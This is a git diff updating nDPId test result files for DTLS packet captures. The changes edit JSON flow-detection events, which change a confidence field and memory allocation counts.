00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507911659748,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":1507911659748,"pkt":"AAAAjZtQSEb7zh73CABFAABta10AAD8Ruf09RG6Z1CDWJ8818BEAWUhKFv7\/AAAAAAAAAAAARAEAADgAAAAAAAAAOP7\/xZOd2weR7n4d5xLXjiJT803Vm2GyIJyqcktro0p9KtUAAAAQADUALwAFAAQACgD7APwA\/QEA"} -01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507911659964,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1507911659964,"pkt":"AAAAjZtQSEb7zh73CABFAABYGTZAAHIRmTnUINYnPURumfARzzUARCmdFv7\/AAAAAAAAAAAALwMAACMAAAAAAAAAI\/7\/IGQQTc4aUtGjb8ohVEQdgum4T0i11AHiQi9xw2nai\/UG"} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507911659975,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":155,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":155,"pkt_l4_len":121,"thread_ts_msec":1507911659975,"pkt":"AAAAjZtQSEb7zh73CABFAACN5wIAAD8RPjg9RG6Z1CDWJ8818BEAeRSaFv7\/AAAAAAAAAAEAZAEAAFgAAQAAAAAAWP7\/xZOd2weR7n4d5xLXjiJT803Vm2GyIJyqcktro0p9KtUAIGQQTc4aUtGjb8ohVEQdgum4T0i11AHiQi9xw2nai\/UGABAANQAvAAUABAAKAPsA\/AD9AQA="} -01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507911659748,"flow_last_seen":1507911660332,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":1079,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1507911660332,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"749bd1edea60396ffaa65213b7971718","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US","subjectDN":"C=US, CN=*.relay.ros.rockstargames.com","fingerprint":"AB:59:0E:11:EC:94:4D:D5:D3:40:7E:6E:3B:8B:6A:19:CA:B7:85:2C"}} -01026{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":25,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1507911659748,"flow_last_seen":1507911868551,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3173,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1507911868551,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} -01024{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1507911659748,"flow_last_seen":1507912041896,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1507912041896,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507911659748,"flow_last_seen":1507911660332,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":1079,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1507911660332,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"749bd1edea60396ffaa65213b7971718","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US","subjectDN":"C=US, CN=*.relay.ros.rockstargames.com","fingerprint":"AB:59:0E:11:EC:94:4D:D5:D3:40:7E:6E:3B:8B:6A:19:CA:B7:85:2C"}} +01026{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":25,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1507911659748,"flow_last_seen":1507911868551,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3173,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1507911868551,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +01024{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1507911659748,"flow_last_seen":1507912041896,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1507912041896,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"dtls2.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":3731,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":1,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1507912041896} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870401 bytes -~~ total memory freed........: 5870401 bytes -~~ total allocations/frees...: 118148/118148 +~~ total memory allocated....: 6004035 bytes +~~ total memory freed........: 6004035 bytes +~~ total allocations/frees...: 120910/120910 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1348 chars diff --git a/test/results/dtls_certificate.pcapng.out b/test/results/dtls_certificate.pcapng.out index ed5b3f64d..1e5e03a7d 100644 --- a/test/results/dtls_certificate.pcapng.out +++ b/test/results/dtls_certificate.pcapng.out @@ -2,8 +2,8 @@ 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645461580895} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645461580895,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1645461580895,"pkt":"AAEC3cZZAAAAw9EGCABFAAXASWxAADQRSEO\/Pjy+o80PtAG7l9wFrJO8Fv79AAAAAAAAAAIARQIAADkAAQAAAAAAOf79\/Kc4HE2ihqeGXU8HJgbvv17oNih5trwpTgkv9KYfrYAAwDAAABH\/AQABAAALAAQDAAECACMAABb+\/QAAAAAAAAADBPILAATmAAIAAAAABOYABOMABOAwggTcMIIDxKADAgECAhMzAAAAHLZ5tboHL3PzAAAAAAAcMA0GCSqGSIb3DQEBBQUAMIGCMQswCQYDVQQGEwJVUzETMBEGA1UECAwKV2FzaGluZ3RvbjEQMA4GA1UEBwwHUmVkbW9uZDEeMBwGA1UECgwVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSwwKgYDVQQDDCNNaWNyb3NvZnQgVXBkYXRlIFNlY3VyZSBTZXJ2ZXIgQ0EgMTAeFw0xNzAyMjcxMjAwMDBaFw0xOTAyMjcwMDAwMDBaMHkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApXYXNoaW5ndG9uMRAwDgYDVQQHDAdSZWRtb25kMRIwEAYDVQQKDAlNaWNyb3NvZnQxDDAKBgNVBAsMA0RTUDEhMB8GA1UEAwwYd3d3LnVwZGF0ZS5taWNyb3NvZnQuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxchtkZuNapLH78mZf0URm+rRwTx\/ZkyEWQKrdPC7T\/I\/VBlNaCjkhqqLjeWcxNjAXFgHV0DQS4Ohn1NUJhGwRm+C9xnh7uNg5h\/HW\/hZG6rQQT\/YIEe4RMEDoHNucdV0ldNkVXCWmH7VdyXRHfM9s1z8dmKF9BhxFUrUndT8KN51NorrFfTkRDxgaXL\/XiTXb5jjFdTMNDoWEcfCSn+mv6sdX3THlAvFHxknV8wAjqvNtxIjUk2YFzbeaTG2Q+ckuiam9dVPaH56OySqB0JYTcsJNz1EFEanNbn3YoH9U68KtmWqXQruXynN3poT1rVwEUFs6k6P4rp9p9jisxqFTQIDAQABo4IBUTCCAU0wDgYDVR0PAQH\/BAQDAgTwMBMGA1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBSLiU8Spy0D\/BrMqi4FzdoDPizAuzAfBgNVHSMEGDAWgBQTA4kJqE\/7jzADbipdbCNlgXR+uzBmBgNVHR8EXzBdMFugWaBXhlVodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBVcGRhdGUlMjBTZWN1cmUlMjBTZXJ2ZXIlMjBDQSUyMDEuY3JsMHMGCCsGAQUFBwEBBGcwZTBjBggrBgEFBQcwAoZXaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBVcGRhdGUlMjBTZWN1cmUlMjBTZXJ2ZXIlMjBDQSUyMDEuY3J0MAkGA1UdEwQCMAAwDQYJKoZIhvcNAQEFBQADggEBAD\/XXW3cyN\/n\/BsXYc461vEQJ\/MooDP0uWOe5wtrpd3XUOKUuYcOvN70FidsM66xtY3sgdh6LUV7Vd3UbwrHsVXRThb+W0JmRxLpORJHovyCUjHJdgWcwAmAecZJ4QHbPt4JGKIezh1zC7zvwpMBEph7\/DE2rRq+Bk7Vj\/NpG5hi7ChZs0a\/4ZlQ63BMdels0iVL7Gl8j2rZV6AKE6rNjGoosoCEoztRWeQE8+sRCm+Ke3bWDxj6rORsUQGgzGimwUgWsdfd3Nhsgd7TmdyKcuJKVjK3IJvBgJOkTc6Wtb9I6keqOhJz+tW6pXPpKnm\/uuS9speSYMehXhdxy6auf74W\/v0AAAAAAAAABABGDAABSQADAAAAAAA6AwAXQQTUxAnF4aD29iFX08UpvzSYHoOfJnjbLUY7FaBYVdRtgMBGO\/4Mp6YBV28sDk7JZ2MLOl9WIA=="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1645461580895,"flow_last_seen":1645461580895,"flow_idle_time":200000,"flow_min_l4_payload_len":1444,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":1444,"flow_avg_l4_payload_len":1444,"midstream":0,"thread_ts_msec":1645461580895,"l3_proto":"ip4","src_ip":"191.62.60.190","dst_ip":"163.205.15.180","src_port":443,"dst_port":38876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"dtls_certificate.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1444,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1645461580895} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877901 bytes -~~ total memory freed........: 5877901 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6011535 bytes +~~ total memory freed........: 6011535 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 474 chars ~~ json string max len.......: 2405 chars diff --git a/test/results/dtls_certificate_fragments.pcap.out b/test/results/dtls_certificate_fragments.pcap.out index 36d64808e..bbdea1b64 100644 --- a/test/results/dtls_certificate_fragments.pcap.out +++ b/test/results/dtls_certificate_fragments.pcap.out @@ -2,11 +2,11 @@ 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1556606275726} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":200000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1556606275726,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1556606275726,"pkt":"AAAAp2BiAAAAtzPNCABFAAFUW5tAAD4Rr1YKusaVI9I7hpmzrZsBQKk0Fv7\/AAAAAAAAAAABKwEAAR8AAAAAAAABH\/79XLdFN6Sz4OQy2sCEjyxqziIlNS85zlQeFiYi19pl1vEAAACgwDDALMAowCTAFMAKAKUAowChAJ8AawBqAGkAaAA5ADgANwA2AIgAhwCGAIXAMsAuwCrAJsAPwAUAnQA9ADUAhMAvwCvAJ8AjwBPACQCkAKIAoACeAGcAQAA\/AD4AMwAyADEAMACaAJkAmACXAEUARABDAELAMcAtwCnAJcAOwAQAnAA8AC8AlgBBAAfAEsAIABYAEwAQAA3ADcADAAoA\/wEAAFUACwAEAwABAgAKABwAGgAXABkAHAAbABgAGgAWAA4ADQALAAwACQAKACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAwAPAAEB"} -01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":200000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1556606275726,"flow_last_seen":1556606275726,"flow_idle_time":200000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1556606275726,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1556606275848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1556606275848,"pkt":"AAAAp2BiAAAAtzPNCABFIABM4VFAAD4RKogj0juGCrrGla2bmbMAOPKRFv7\/AAAAAAAAAAAAIwMAABcAAAAAAAAAF\/7\/FGas+MFHIUbk58MIduuc4UCKEPlD"} 